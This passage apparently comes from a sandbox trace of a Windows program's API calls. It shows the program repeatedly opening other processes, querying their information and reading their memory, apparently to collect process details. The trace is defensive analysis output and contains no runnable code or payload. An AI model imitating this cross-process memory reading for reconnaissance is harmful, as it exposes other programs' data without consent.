lpBaseAddress=0x7d1888, lpBuffer=0x138c580, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.379] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.379] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.379] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x59d020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.380] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.380] malloc (_Size=0x6a) returned 0xd9d190 [0264.380] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d18ea, lpBuffer=0xd9d190, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.381] free (_Block=0xd9d190) [0264.381] CloseHandle (hObject=0x28c) returned 1 [0264.381] _ui64tow_s (in: _Value=0x184, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="388") returned 0x0 [0264.382] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="388") returned 3 [0264.382] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.382] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.383] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x28c [0264.383] GetLastError () returned 0x0 [0264.383] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.383] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x42c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.383] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.383] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7e1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.384] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7e1888, lpBuffer=0x138c580, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.384] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.384] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.384] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x42c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.384] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.384] malloc (_Size=0x6a) returned 0xd9d190 [0264.384] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7e18ea, lpBuffer=0xd9d190, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.385] free (_Block=0xd9d190) [0264.385] CloseHandle (hObject=0x28c) returned 1 [0264.386] _ui64tow_s (in: _Value=0x5fc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1532") returned 0x0 [0264.386] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1532") returned 4 [0264.386] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.386] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.387] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5fc) returned 0x28c [0264.387] GetLastError () returned 0x0 [0264.387] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.387] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35a018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.387] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.387] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5e1c90, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.387] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5e1888, lpBuffer=0x138c580, nSize=0x70, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.388] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.388] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.388] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x35a020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.388] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.388] malloc (_Size=0x78) returned 0xd9d190 [0264.388] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5e18f8, lpBuffer=0xd9d190, nSize=0x76, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.389] free (_Block=0xd9d190) [0264.389] CloseHandle (hObject=0x28c) returned 1 [0264.389] _ui64tow_s (in: _Value=0x4a0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1184") returned 0x0 [0264.390] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1184") returned 4 [0264.390] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.390] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.391] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a0) returned 0x28c [0264.391] GetLastError () returned 0x0 [0264.391] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.391] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x327018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.391] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.392] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.392] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541888, lpBuffer=0x138c580, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.392] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.392] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.392] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x327020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.392] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x541270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.393] malloc (_Size=0x74) returned 0xd9d190 [0264.393] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5418f4, lpBuffer=0xd9d190, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.393] free (_Block=0xd9d190) [0264.393] CloseHandle (hObject=0x28c) returned 1 [0264.394] _ui64tow_s (in: _Value=0xc18, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3096") returned 0x0 [0264.394] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3096") returned 4 [0264.394] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.394] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.395] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc18) returned 0x28c [0264.395] GetLastError () returned 0x0 [0264.395] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.396] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e9018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.396] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.396] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.396] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1888, lpBuffer=0x138c580, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.396] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.397] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.397] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2e9020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.397] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.397] malloc (_Size=0x62) returned 0xdb02d0 [0264.397] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b18e2, lpBuffer=0xdb02d0, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.397] free (_Block=0xdb02d0) [0264.398] CloseHandle (hObject=0x28c) returned 1 [0264.398] _ui64tow_s (in: _Value=0xebc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3772") returned 0x0 [0264.401] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3772") returned 4 [0264.401] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.401] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.402] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xebc) returned 0x28c [0264.402] GetLastError () returned 0x0 [0264.402] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.403] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x43a018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.403] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.403] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261c30, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.403] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261888, lpBuffer=0x138c580, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.403] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.404] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.404] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x43a020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.404] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x261270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.404] malloc (_Size=0x5a) returned 0xdb0420 [0264.404] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2618da, lpBuffer=0xdb0420, nSize=0x58, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb0420*, lpNumberOfBytesRead=0x0) returned 1 [0264.405] free (_Block=0xdb0420) [0264.405] CloseHandle (hObject=0x28c) returned 1 [0264.405] _ui64tow_s (in: _Value=0xd24, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3364") returned 0x0 [0264.405] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3364") returned 4 [0264.406] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.406] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.407] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xd24) returned 0x28c [0264.407] GetLastError () returned 0x0 [0264.407] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.407] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x29c018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.407] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.407] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5a1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.407] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5a1888, lpBuffer=0x138c580, nSize=0x5a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.408] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.408] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.408] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x29c020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.408] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.408] malloc (_Size=0x62) returned 0xdb03b0 [0264.408] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5a18e2, lpBuffer=0xdb03b0, nSize=0x60, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.409] free (_Block=0xdb03b0) [0264.409] CloseHandle (hObject=0x28c) returned 1 [0264.469] _ui64tow_s (in: _Value=0xc90, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3216") returned 0x0 [0264.469] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3216") returned 4 [0264.469] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.469] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc90) returned 0x28c [0264.472] GetLastError () returned 0x0 [0264.472] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.472] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3b5018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.472] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.472] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1c50, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.473] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1888, lpBuffer=0x138c580, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.473] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.473] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.473] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3b5020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.474] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.474] malloc (_Size=0x64) returned 0xdb03b0 [0264.474] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1d18e4, lpBuffer=0xdb03b0, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb03b0*, lpNumberOfBytesRead=0x0) returned 1 [0264.475] free (_Block=0xdb03b0) [0264.475] CloseHandle (hObject=0x28c) returned 1 [0264.475] _ui64tow_s (in: _Value=0xbbc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3004") returned 0x0 [0264.475] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3004") returned 4 [0264.476] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.476] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.477] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xbbc) returned 0x28c [0264.477] GetLastError () returned 0x0 [0264.477] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.477] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3bd018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.477] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.477] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1c80, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.478] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4e1888, lpBuffer=0x138c580, nSize=0x6c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.478] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.478] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.478] ReadProcessMemory (in: hProcess=0x28c, 